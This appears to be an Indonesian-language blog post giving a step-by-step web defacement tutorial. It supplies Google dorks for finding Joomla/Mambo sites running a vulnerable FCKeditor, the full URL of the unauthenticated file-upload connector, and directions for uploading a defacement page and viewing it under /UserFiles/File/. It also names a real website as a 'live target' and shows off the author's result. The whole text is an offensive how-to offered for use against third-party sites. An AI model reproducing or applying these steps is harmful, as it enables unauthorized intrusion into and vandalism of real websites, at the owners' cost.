Dork :
- inurl:index.php?option=com_content
- "/mambots/editors/fckeditor"
Copy lalu paste di search engine ( google etc. )
Step 2 :
Pilih website yang mau di eksekusi mas bero
Step 3 :
Tambahkan exploit di belakang website itu :/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Ex. http://website.com/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Step 4 :
1. Browse script pepesan kamu format bisa beberapa extensi : .jpg / .html / .txt
2.Klik upload untuk upload file kamu
Step 5 :
Panggil file deface an kamu di page http://website.com/UserFiles/File/file_kamu.txt Karena gw upload file extensi .html
TARAA SELESAI ^_^
live target : http://www.artegijon.com/
ni hasil saya : click disini
Posting Komentar